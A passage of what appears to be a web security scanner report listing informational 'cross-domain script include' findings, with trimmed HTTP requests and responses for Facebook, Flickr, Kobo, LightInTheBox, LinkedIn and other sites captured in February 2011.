User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.2.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:36:09 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Link: <http://www.exploit-db.com/?p=2689>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 16526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.165. http://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.166. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.167. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:21 GMT
Content-Length: 9095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yj/r/xX_iDFXECVt.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.168. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Fpages%2FThumbshots%2F119367484758046%3Fv%3Dwall&layout=button_count&show_faces=true&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 20:24:23 GMT
Content-Length: 7535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.169. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=ZUb6V; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:09 GMT
Content-Length: 10817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.170. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:39 GMT
Content-Length: 10796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.171. http://www.facebook.com/supermediacom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /supermediacom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

19.172. http://www.facebook.com/xd_receiver_v0.4.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /xd_receiver_v0.4.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver_v0.4.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 445
Content-Type: text/html; charset=utf-8
Expires: Fri, 03 Feb 2012 13:49:25 -0800
Pragma:
Connection: close
Date: Thu, 03 Feb 2011 21:49:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Pa
...[SNIP]...
</script>
<script src="http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js"
type="text/javascript">

</script>
...[SNIP]...

19.173. http://www.flickr.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:30 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com
X-Served-By: www87.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Search</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta n
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/g/javascript/search.js.v84157.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/explore_search.js.v99238.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/yahoo/history_2.6.0.js.v61045.17"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600136&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

19.174. http://www.flickr.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/?q=squishycow HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=39be8d16km8nc&b=3&s=78; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:32 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:31 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:31 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:32 GMT; path=/; domain=.flickr.com
X-Served-By: www149.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>squishycow - Flickr: Search</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/g/javascript/search.js.v84157.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/explore_search.js.v99238.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/yahoo/history_2.6.0.js.v61045.17"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600186&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

19.175. http://www.inceptor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inceptor.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.inceptor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:20:10 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:35:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<!--jquery-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
<li class="facebook-like">
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

19.176. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=829c034d40083b97a500eea83e80612d; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:12 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div class="ja-content-main clearfix">
                   <script type="text/javascript" src="http://www.indeed.com/ads/apiresults.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div class="jamod-content ja-box-ct clearfix">
       <script type="text/javascript" src="http://cdn.socialtwist.com/2009100526657/script.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://jobroll.indeed.com/ads/jobroll2.js">
</script>
...[SNIP]...
</a>
<script src="http://static.getclicky.com/84969.js" type="text/javascript"></script>
...[SNIP]...

19.177. http://www.kminek.pl/lab/yetii/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /lab/yetii/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lab/yetii/ HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18934

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots"
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.178. http://www.kobobooks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kobobooks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.kobobooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 22:00:45 GMT
Server: Microsoft-IIS/6.0
srv: www-13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gzhef2455v4bcx55lt11oh45; path=/; HttpOnly
Set-Cookie: scToKobo=; expires=Fri, 03-Feb-2012 22:00:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 657861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<script src="//cdn.optimizely.com/js/4041011.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

   <script src="http://thesearchagency.net/tsawaypoint.php?siteid=698&wayid=3795" type="text/javascript" language="JavaScript"></script>
...[SNIP]...

19.179. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:45 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJclZoSofA3ibAg==; expires=Fri, 03-Feb-12 22:01:45 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s6; path=/
Cache-control: private
Content-Length: 154109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cloud.lbox.me/includes/templates/dev_v2/css/stylesheet_47851.css" />
<script type="text/javascript" src="http://cloud.lbox.me/includes/templates/dev_v2/jscript/lang/en_47851.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script><script type="text/javascript" src="http://cloud.lbox.me/includes/templates/dev_v2/jscript/vJquery_47851.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div class="margin_t"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="margin_t">
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div class="allborder margin_t "><script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lightinthebox.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

19.180. http://www.linkedin.com/in/troyd/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /in/troyd/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
